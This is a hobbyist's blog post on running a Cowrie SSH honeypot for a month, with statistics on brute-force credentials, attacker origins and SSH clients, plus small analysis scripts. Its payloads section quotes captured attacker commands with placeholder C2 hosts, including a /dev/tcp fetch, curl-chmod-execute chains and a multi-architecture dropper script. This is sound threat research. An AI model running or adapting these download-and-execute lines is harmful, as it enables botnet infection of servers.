Adventures in Running a Honeypot

Posted 2024/08/18

I’ve been doing some malware research as a hobby for a while now because I find it interesting and useful for sharpening my reverse engineering skills. Malware researchers analyze malware samples to determine their unique features, objectives, and potential effects. I usually work on random infostealers that pop up on Discord or old malicious Microsoft Office documents (not all of which I have written about)¹. Looking to get deeper into malware research, I decided to set up a honeypot server to do a bit more threat hunting and collect newer malware samples to analyze.

What Is a Honeypot?

A honeypot is a system or piece of data that appears to hold information or resources of value to a potential online attacker. In reality, the honeypot is isolated and monitored, and it logs the attacker’s activity for analysis. Honeypot servers host services that appear vulnerable in order to bait attacks, which can then be analyzed to better understand their source and behaviour.

How I Set Up My Honeypot

My honeypot server is an Ubuntu server VM running in an isolated cloud account. The server has its own public IPv4 address and runs the Cowrie SSH/Telnet honeypot software on the usual SSH port, TCP/22. Cowrie is intentionally set up to accept a variety of common usernames and passwords, and after a successful login it emulates a Debian 5.0 shell with a fake file system. Attackers can send commands to the shell, upload files with SFTP or SCP, or attempt SSH proxying. Every action taken and every credential used is logged. Cowrie also saves any malicious files uploaded to it or downloaded through attempted Wget or Curl commands for further analysis. My Cowrie installation is also set up to send its logs to Datadog, which makes activity on the honeypot searchable and lets me take advantage of Datadog’s threat intelligence capabilities.

To make Cowrie more convincing as an SSH server, the real SSH server that I use to manage the machine runs on a different port and is hidden behind port knocking. Port knocking uses the firewall to block access to the SSH server’s port unless a specific sequence of connection attempts is made first. This keeps the real SSH server out of port scans, which makes Cowrie more convincing as the machine’s legitimate SSH server.
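Conceptually, a port knocking daemon only has to track how far each source IP has progressed through the secret sequence. The Python sketch below models that state machine. The port numbers, the 10-second timeout and the KnockTracker class are hypothetical. Real daemons like knockd are configured through their own config file and open the port by running a firewall command, not through anything like this class:

```python
from __future__ import annotations

import time

# Hypothetical secret sequence and timeout, for illustration only.
KNOCK_SEQUENCE = (7000, 8000, 9000)
SEQUENCE_TIMEOUT = 10.0  # seconds allowed to finish the whole sequence


class KnockTracker:
    """Per-source-IP progress through a port knocking sequence."""

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=SEQUENCE_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        self.progress: dict[str, tuple[int, float]] = {}  # ip -> (next index, start time)
        self.allowed: set[str] = set()

    def knock(self, src_ip: str, port: int, now: float | None = None) -> bool:
        """Record one connection attempt; return True once src_ip may reach SSH."""
        now = time.monotonic() if now is None else now
        index, started = self.progress.get(src_ip, (0, now))
        if index > 0 and now - started > self.timeout:
            index = 0  # too slow: the sequence has to start over
        if index == 0:
            started = now
        if port == self.sequence[index]:
            index += 1
        else:
            # A wrong port resets progress, but may itself be a fresh first knock.
            index = 1 if port == self.sequence[0] else 0
            started = now
        if index == len(self.sequence):
            self.allowed.add(src_ip)  # a real daemon would add a firewall rule here
            self.progress.pop(src_ip, None)
        else:
            self.progress[src_ip] = (index, started)
        return src_ip in self.allowed
```

In this model, any wrong port in between resets progress. A sequential port scan that sweeps past 7000, 8000 and 9000 therefore never completes the sequence, because it also hits 7001, 7002 and so on.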

Random things that I learned from setting this all up:

Some Ubuntu 24.04 images available on cloud providers won’t respect the port you set in /etc/ssh/sshd_config anymore 😭; instead, you have to edit the systemd ssh.socket configuration
Remember to actually enable the knockd and SSH services to run on boot before you reboot the server 🤣 (I think SSH somehow got disabled during all my attempts at changing the port)
Some cloud providers offer serial access to your machines so you can log in through a TTY session in case you mess up your SSH!
You can’t use serial access unless you set a password for your user account, which I usually don’t do because I use SSH keys 😭
Some cloud providers don’t like you using UFW for your firewall and instead want you to manage iptables rules manually?

With this setup in place, and knowing that attackers are constantly port scanning or spraying the entire IPv4 address space with attacks², all I had to do was wait for attackers to run brute-force password attacks against the honeypot and then analyze the activity that followed. I also plan on adding the TANNER/SNARE web application honeypot created by the MushMush Foundation in the near future to collect information on web application attacks as well.
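The five-minute figure in footnote 2 implies a very high packet rate. As a rough calculation, covering one port on all 2^32 IPv4 addresses in five minutes takes about 14.3 million probes per second. That is why tools like masscan send raw packets asynchronously instead of waiting on each connection:

```python
# Back-of-the-envelope: probes per second needed to hit one port on every
# IPv4 address within a time budget. Ignores reserved ranges, exclusion
# lists and retransmissions, so it is only a rough estimate.
IPV4_ADDRESSES = 2 ** 32


def required_probe_rate(seconds: float, ports: int = 1) -> float:
    """Probe packets per second needed to cover the whole IPv4 space."""
    return IPV4_ADDRESSES * ports / seconds


rate = required_probe_rate(5 * 60)
print(f"{rate:,.0f} probes per second")  # prints "14,316,558 probes per second"
```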

What I Have Found So Far

I’ve been running the honeypot server for about a month and have collected ~150 malware samples so far! Attackers really are hard at work, with cloud server instances and botnets dedicated to port scanning the internet and running password spraying attacks.

Below is a histogram of activity on the Cowrie service. Note the spikes in activity whenever a big password brute-force attack is conducted.

histogram of activity
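Hourly counts like these can also be produced directly from Cowrie’s JSON log, which records each login attempt as a cowrie.login.success or cowrie.login.failed event with a timestamp. A minimal Python sketch, assuming one JSON event per line as in Cowrie’s cowrie.json output. The function name is hypothetical, and this is not necessarily how the histogram above was produced:

```python
import json
from collections import Counter
from datetime import datetime

LOGIN_EVENTS = {"cowrie.login.success", "cowrie.login.failed"}


def hourly_login_attempts(lines):
    """Count Cowrie login attempts per hour (UTC) from JSON log lines."""
    counts = Counter()
    for line in lines:
        event = json.loads(line)
        if event.get("eventid") not in LOGIN_EVENTS:
            continue
        # Cowrie writes UTC timestamps ending in "Z"; fromisoformat() before
        # Python 3.11 rejects that suffix, so spell out the offset instead.
        ts = datetime.fromisoformat(event["timestamp"].replace("Z", "+00:00"))
        counts[ts.replace(minute=0, second=0, microsecond=0)] += 1
    return counts
```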

Usernames & Passwords

Unsurprisingly, some of the most frequently used passwords in brute-force attacks were variations of 123456, root, admin, and password. Some passwords surprised me with how often they were attempted: keywords related to cryptocurrencies³, common first names, and keyboard layout tricks like 1q2w3e4r (zigzagging across the first two rows of a QWERTY keyboard) or !QAZ@WSX (the first two columns, read top to bottom with Shift held).

bar graph of most common usernames and passwords

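I tried to categorize the passwords used and got the following rough counts (distinct entries in each category, followed by the total number of login attempts in parentheses):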

'password' variations:                                  78 (941 attempts)
'root' variations:                                      83 (593 attempts)
numerical:                                              248 (6198 attempts)
domains:                                                19 (422 attempts)
linux distro names:                                     15 (299 attempts)
common first names:                                     209 (702 attempts)
linux software names:                                   63 (624 attempts)
cryptocurrency related:                                 23 (271 attempts)

identical username and password:                        1313 (7459 attempts)
password starts with username (excluding identical):    942 (2965 attempts)
username in password (excluding identical):             957 (2995 attempts)

total login attempts:                                   23201
total user/pw combinations:                             5952
total usernames tested:                                 1460
total passwords tested:                                 3705
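The username-based rows of that table come down to a few string comparisons. Below is a sketch of how they could be tallied. It assumes the attempts are available as (username, password) pairs and that the first number in each row counts distinct username/password combinations. The category labels and the "numerical" rule (ASCII digits only) are also assumptions, not the exact method behind the numbers above:

```python
from collections import Counter


def categorize(username: str, password: str) -> list[str]:
    """Tag one login attempt with the categories it falls into."""
    tags = []
    if password == username:
        tags.append("identical")
    elif username:
        # Mirrors the "(excluding identical)" rows: only checked when they differ.
        if password.startswith(username):
            tags.append("starts_with_username")
        if username in password:
            tags.append("username_in_password")
    if password.isascii() and password.isdigit():
        tags.append("numerical")
    return tags


def summarize(attempts):
    """Map category -> (distinct user/pw combinations, total attempts)."""
    combos = {}
    totals = Counter()
    for username, password in attempts:
        for tag in categorize(username, password):
            combos.setdefault(tag, set()).add((username, password))
            totals[tag] += 1
    return {tag: (len(combos[tag]), totals[tag]) for tag in totals}
```

Every password that starts with the username also contains it, which is consistent with the "username in password" row being slightly larger than the "starts with username" row.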

Not all of the passwords tested come from password dictionaries, either. Bots will occasionally tailor passwords to the target, for example by incorporating the target’s IP address or service name into the password.
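A simple heuristic can spot those tailored guesses in the logs. The hypothetical check below flags a password that contains the target’s IP address (with or without the dots) or the service name. The function and the forms it checks are assumptions, and 203.0.113.10 is a documentation address:

```python
def looks_tailored(password: str, target_ip: str, service: str = "ssh") -> bool:
    """Heuristic: does the password embed the target's IP address or service name?"""
    pw = password.lower()
    ip_forms = {target_ip, target_ip.replace(".", ""), target_ip.replace(".", "_")}
    return service.lower() in pw or any(form in pw for form in ip_forms)


print(looks_tailored("root@203011310", "203.0.113.10"))  # True
print(looks_tailored("Ssh@2024", "203.0.113.10"))  # True
print(looks_tailored("123456", "203.0.113.10"))  # False
```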

Geographic Origin

Analyzing the countries that attacks came from was pretty interesting. It makes sense that the United States, China, South Korea, and India show up at the top, considering that they have some of the largest Internet of Things (IoT) markets in the world, and IoT devices are some of the largest contributors to botnets like Mirai. Many botnets use these devices to conduct DDoS attacks and password brute-force attacks. After these IoT market heavyweights, I expected the ranking of the remaining countries to roughly follow the size of each country’s IPv4 address allocation, but that does not seem to be the case.

bar graph of most common countries of origin

Grouping IPs by autonomous system number (ASN) shows that not all attacks come from IoT devices. Many attacks do originate from consumer telecommunication networks such as ASN4134 CHINANET-BACKBONE, ASN4766 Korea Telecom, and ASN7922 Comcast, which is consistent with compromised IoT devices. However, many attacks also come from cloud providers like ASN396982 Google Cloud Platform, ASN14061 DigitalOcean, ASN8075 Microsoft, and ASN37963 Alibaba. This suggests that insecurely configured servers are being added to botnets, or that attackers are setting up port scanners, brute-forcers, and command & control infrastructure on these providers.

bar graph of most common ASNs of origin
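Once each source IP has been resolved to its ASN, grouping by ASN is a simple aggregation. The sketch below assumes a pre-built ip_to_asn lookup table, which is hypothetical here; in practice it would come from an IP-to-ASN database or a log enrichment service. It counts each source IP once so that a single noisy host does not dominate the ranking:

```python
from collections import Counter


def top_asns(src_ips, ip_to_asn, n=5):
    """Rank ASNs by the number of distinct source IPs seen from each."""
    counts = Counter(ip_to_asn.get(ip, "unknown") for ip in set(src_ips))
    return counts.most_common(n)


# Hypothetical lookup table using documentation IP ranges.
ip_to_asn = {
    "198.51.100.1": "AS14061 DigitalOcean",
    "198.51.100.2": "AS14061 DigitalOcean",
    "203.0.113.9": "AS4134 CHINANET-BACKBONE",
}
seen = ["198.51.100.1", "198.51.100.1", "198.51.100.2", "203.0.113.9", "192.0.2.50"]
print(top_asns(seen, ip_to_asn))
```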

SSH Client Versions

Clients that connect to SSH servers usually send information about their client version and their supported encryption and hashing algorithms. Looking at SSH client versions, we can see that common libraries used to build brute-forcers include Go’s golang.org/x/crypto/ssh package, Paramiko for Python, Makiko for Rust, and libssh. Many attackers also use regular clients like PuTTY or OpenSSH. It is interesting to see that distribution-packaged OpenSSH builds also advertise the client’s Debian, Ubuntu, or Raspbian package version. Port scanners like Nmap, ZGrab2.0, and MGLNDD can also be seen.

bar graph of most common ssh versions
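The version information comes from the identification string each side sends first. RFC 4253 (section 4.2) defines its format as SSH-protoversion-softwareversion, optionally followed by a space and free-form comments. The distro details in OpenSSH banners sit in that comments part. Below is a minimal parser. The example banners are illustrative, not values taken from the honeypot logs, and grouping by the text before the first underscore is a rough assumption:

```python
def parse_ssh_banner(banner: str) -> dict:
    """Split an SSH identification string (RFC 4253, section 4.2)."""
    line = banner.rstrip("\r\n")
    if not line.startswith("SSH-"):
        raise ValueError("not an SSH identification string")
    ident, _, comments = line.partition(" ")
    parts = ident.split("-", 2)  # softwareversion may not contain "-"
    if len(parts) != 3:
        raise ValueError("missing protocol or software version")
    _, proto, software = parts
    return {"proto": proto, "software": software, "comments": comments or None}


def client_family(software: str) -> str:
    """Rough grouping: the name before the first '_', e.g. 'OpenSSH_9.6p1' -> 'OpenSSH'."""
    return software.split("_", 1)[0]
```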

Commands & Payloads

Finally, moving on to what we set up the whole honeypot for: the attacks themselves!

After a successful login, many of the brute-forcers that attack the honeypot seem to just collect information about the system, presumably so the attacker can come back and investigate the server later. Common information-gathering commands include the following:

uname -s -v -n -r -m  # collects information about the kernel, OS, hostname, CPU architecture
uname -s -m  # less detailed variant of above used to get architecture
whoami  # finds what user the attacker logged in as, useful to see what permissions are available
lscpu | grep "CPU(s):                "  # getting CPU information (logical CPU count)
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*  # probing for GSM/USB modems and SMS gateway software and sockets
cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c  # getting CPU information
cat /etc/os_release  # getting OS information
uptime  # getting system uptime
grep -c ^processor /proc/cpuinfo  # CPU information (core count)
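To make two of those CPU probes concrete, the Python sketch below reproduces what they compute from the text of /proc/cpuinfo. It only illustrates what the shell pipelines do; it is not something the attackers ran, and the function name and sample input are made up:

```python
def cpu_summary(cpuinfo: str):
    """Mimic two of the probes above on the text of /proc/cpuinfo.

    core_count  ~ grep -c ^processor /proc/cpuinfo
    model_runs  ~ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c
    """
    core_count = 0
    runs = []  # [count, text] pairs; uniq -c only merges *adjacent* duplicates
    for line in cpuinfo.splitlines():
        if line.startswith("processor"):
            core_count += 1
        if "name" in line:
            fields = line.split(":")
            # Without -s, cut prints lines that lack the delimiter unchanged.
            text = fields[1] if len(fields) > 1 else line
            if runs and runs[-1][1] == text:
                runs[-1][0] += 1
            else:
                runs.append([1, text])
    return core_count, [tuple(run) for run in runs]
```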

Most other attacker commands involved downloading executables with Wget or Curl, running those executables, moving or deleting files, changing passwords, changing file permissions, or gaining persistence with Cron.

It was interesting to see that when downloading malicious files, attackers would try Wget, Curl, and BusyBox Wget one after another, in case the victim didn’t have all of them installed. Some attackers would try installing Curl themselves with the APT package manager before this step. Some attackers also went the extra step of using Bash’s /dev/tcp redirection to open a TCP socket and make the HTTP request themselves, in case none of those utilities were available:

exec 6<>/dev/tcp/<C2_SERVER_IP>/60100 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/2ODoY9YgNB
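That one-liner relies on Bash’s /dev/tcp redirection. exec 6<> opens a read-write TCP connection to the C2 server as file descriptor 6, echo writes a bare GET request to it, and cat reads the server’s response from descriptor 6 into a file under /tmp. Because the path spells out the C2 address and port, they are easy to pull out of logged commands as indicators of compromise. Below is a minimal sketch; the regex and function name are hypothetical, and 192.0.2.10 is a documentation address standing in for the redacted C2 IP:

```python
import re

# Bash treats /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT in redirections as
# network sockets, so the path itself names the remote endpoint.
DEV_NET_PATH = re.compile(r"/dev/(tcp|udp)/([^/\s]+)/(\d+)")


def dev_tcp_endpoints(command: str) -> list[tuple[str, str, int]]:
    """Extract (protocol, host, port) from /dev/tcp or /dev/udp redirections."""
    return [(proto, host, int(port)) for proto, host, port in DEV_NET_PATH.findall(command)]


cmd = "exec 6<>/dev/tcp/192.0.2.10/60100 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/2ODoY9YgNB"
print(dev_tcp_endpoints(cmd))  # [('tcp', '192.0.2.10', 60100)]
```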

It was also interesting to see that there were some rivalries among malware authors. Attackers would frequently try to kill processes they suspected were rival malware, or harden firewall rules to block rival command & control (C2) servers:

iptables -A INPUT -s <RIVAL_C2_IPV4_ADDR> -j DROP  # blocking rival C2 server in the firewall
pkill bin.x86_64  # killing rival malicious processes
ps | grep '[Mm]iner'  # searching for competing cryptominers
ps -ef | grep '[Mm]iner'
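The odd-looking [Mm]iner pattern in those ps | grep commands does two jobs. Below is a model using Python’s re module, which handles this simple bracket expression the same way grep does. The ps output is made up:

```python
import re

# grep '[Mm]iner' matches "Miner" or "miner" anywhere in a line. The bracket
# expression is also a common idiom for hiding grep from its own results:
# grep's entry in the process list contains the literal text "[Mm]iner",
# which the pattern itself does not match.
MINER = re.compile(r"[Mm]iner")

ps_output = [
    "1234 ./xmrig-miner",    # hypothetical rival cryptominer
    "1300 grep [Mm]iner",    # the grep process itself
    "1301 sshd: root@pts/0",
]
matches = [line for line in ps_output if MINER.search(line)]
print(matches)  # ['1234 ./xmrig-miner']
```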

These attempts to block rival C2 servers actually led me to C2 servers that hadn’t attacked my honeypot yet, some of them running HTTP or FTP servers full of additional samples I could download.

Below is a graph of the commands that attackers ran most often:

bar graph of most common commands run
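A ranking like this can be rebuilt from Cowrie’s cowrie.command.input events, whose input field holds the raw command line. Attackers chain commands with semicolons, && and ||, so this sketch splits on those operators and counts each program name. Counting by program name and the naive splitting (which ignores shell quoting) are assumptions, not necessarily how the graph above was built:

```python
import json
import re
from collections import Counter

# Naive split on command separators; does not understand shell quoting.
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\|)\s*")


def top_commands(lines, n=10):
    """Rank program names from Cowrie 'cowrie.command.input' JSON events."""
    counts = Counter()
    for line in lines:
        event = json.loads(line)
        if event.get("eventid") != "cowrie.command.input":
            continue
        for part in SEPARATORS.split(event["input"]):
            tokens = part.split()
            if tokens:
                counts[tokens[0]] += 1
    return counts.most_common(n)
```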

The majority of malicious programs were delivered to my honeypot through Wget or Curl commands that downloaded them from an HTTP server. These downloads were usually chained with a command that sets execute permissions and then one that runs the malicious program, like curl -s -O http://<C2_SERVER_IP>/bot && chmod 777 bot && ./bot. Sometimes these commands would download the malicious ELF or PE executable directly, and sometimes they would download a dropper script. These dropper scripts contain URLs for executables compiled for many different CPU architectures, and the script tries to download and run each of them:

#!/bin/bash
PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin
/bin/rm bins.sh
wget http://<C2_SERVER_IP>/bins/Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f; curl -O  http://<C2_SERVER_IP>/bins/Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f;/bin/busybox wget http://<C2_SERVER_IP>/bins/Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f; chmod 777 Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f; ./Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f;rm Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f ##powerpc-440fp
wget http://<C2_SERVER_IP>/bins/IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi; curl -O  http://<C2_SERVER_IP>/bins/IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi;/bin/busybox wget http://<C2_SERVER_IP>/bins/IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi; chmod 777 IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi; ./IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi;rm IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi ##x86_64
# [...TRUNCATED FOR READABILITY...]
wget http://<C2_SERVER_IP>/bins/2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX; curl -O  http://<C2_SERVER_IP>/bins/2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX;/bin/busybox wget http://<C2_SERVER_IP>/bins/2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX; chmod 777 2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX; ./2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX;rm 2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX ##armv6l
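Scripts in this layout are convenient to mine for indicators, since each line fetches one binary and ends with a ## comment naming the target architecture. The sketch below maps each architecture tag to its download URLs. It assumes the layout shown above; other droppers will differ. The function name is hypothetical and the example uses a documentation address:

```python
import re

URL = re.compile(r"https?://[^\s;]+")


def parse_dropper(script: str) -> dict[str, list[str]]:
    """Map each '##arch' tag in a dropper script to the URLs on that line."""
    per_arch = {}
    for line in script.splitlines():
        body, sep, arch = line.rpartition("##")
        if not sep:
            continue  # no architecture tag on this line
        urls = sorted(set(URL.findall(body)))
        if urls:
            per_arch[arch.strip()] = urls
    return per_arch
```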

Some malicious programs were also uploaded to the honeypot using SFTP or SCP and then run with follow-up commands.

The malicious files I have collected so far have been in many different file formats and compiled for many different CPU architectures:

 ELF executable, MIPS, MIPS-I, SYSV                     24 files
 ELF executable, ARM, EABI4, SYSV                       21 files
 ELF executable, ARM, ARM                               20 files
 ELF executable, x86-64, SYSV                           18 files
 ELF executable, Intel 80386, SYSV                      17 files
 ELF executable, PowerPC or cisco 4500, SYSV            10 files
 ELF executable, Renesas SH, SYSV                       7 files
 Bourne-Again shell script, ASCII text executable       5 files
 ELF executable, Motorola m68k, 68020, SYSV             4 files
 ELF executable, SPARC, SYSV                            3 files
 XML 1.0 document, ASCII text                           2 files
 PE32+ executable x86-64, for MS Windows                2 files
 HTML document, ASCII text                              2 files
 ELF executable, MIPS, MIPS64, SYSV                     2 files
 ELF executable, Synopsys ARCompact ARC700 cores, SYSV  1 file
 ELF executable, ARM, EABI5 GNU/Linux                   1 file
 ELF 64-bit LSB shared object, x86-64, SYSV             1 file
 ELF 64-bit LSB shared object, ARM aarch64, SYSV        1 file
 ELF 32-bit LSB shared object, Intel 80386, GNU/Linux   1 file
 ELF 32-bit LSB shared object, ARM, EABI5 GNU/Linux     1 file
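Most of these descriptions come from a handful of fields at the start of the ELF header: the 32/64-bit class and byte order in e_ident, followed by the e_type and e_machine fields. The minimal Python sketch below decodes them. Machine numbers are taken from the ELF EM_* constants, and only the architectures in the table above are listed. One caveat relevant to the table: e_type 3 (ET_DYN) covers both shared libraries and position-independent executables, so some of the "shared object" entries may be PIE executables:

```python
import struct

# Subset of ELF e_machine values (EM_* constants in <elf.h>).
E_MACHINE = {
    2: "SPARC", 3: "Intel 80386", 4: "Motorola m68k", 8: "MIPS",
    20: "PowerPC", 40: "ARM", 42: "Renesas SH", 62: "x86-64",
    93: "ARCompact", 183: "AArch64",
}
E_TYPE = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}


def describe_elf(header: bytes) -> str:
    """Summarize the first 20 bytes of an ELF file, roughly like file(1)."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    bits = {1: 32, 2: 64}[header[4]]            # e_ident[EI_CLASS]
    byte_order = {1: "<", 2: ">"}[header[5]]    # e_ident[EI_DATA]: LSB / MSB
    # e_type and e_machine are the two 16-bit fields right after e_ident.
    e_type, e_machine = struct.unpack_from(byte_order + "HH", header, 16)
    kind = E_TYPE.get(e_type, f"type {e_type}")
    arch = E_MACHINE.get(e_machine, f"machine {e_machine}")
    order = "LSB" if byte_order == "<" else "MSB"
    return f"ELF {bits}-bit {order} {kind}, {arch}"
```

To check a sample on disk, read its first 20 bytes in binary mode (open(path, "rb").read(20)) and pass them to describe_elf.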

There are so many samples to sift through, but with this new material to analyze, expect my blog posts on malware reverse engineering to resume in the future!

All Indicators of Compromise (malicious file hashes, URLs, domain names, and IP addresses) that I’m collecting from this honeypot project can be found in this VirusTotal collection.
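VirusTotal can look up files by hash, so a SHA-256 digest per sample is the natural key for the file-hash part of these indicators. The minimal sketch below assumes the collected samples sit as plain files in a single directory. The function names and directory layout are hypothetical:

```python
import hashlib
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 16) -> str:
    """SHA-256 of a file, read in chunks so large samples don't fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_samples(directory) -> dict[str, list[str]]:
    """Group sample files by SHA-256 so repeated downloads collapse to one hash."""
    by_hash: dict[str, list[str]] = {}
    for path in sorted(p for p in Path(directory).iterdir() if p.is_file()):
        by_hash.setdefault(sha256_file(path), []).append(path.name)
    return by_hash
```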

¹ I did once intercept a Log4j exploit payload, thrown at my website, that contained the January 2024 version of the RedTail cryptominer malware.
² It only takes about 5 minutes to scan the entire IPv4 address space using tools like masscan.
³ Cryptocurrency is an abject disaster - Drew DeVault’s blog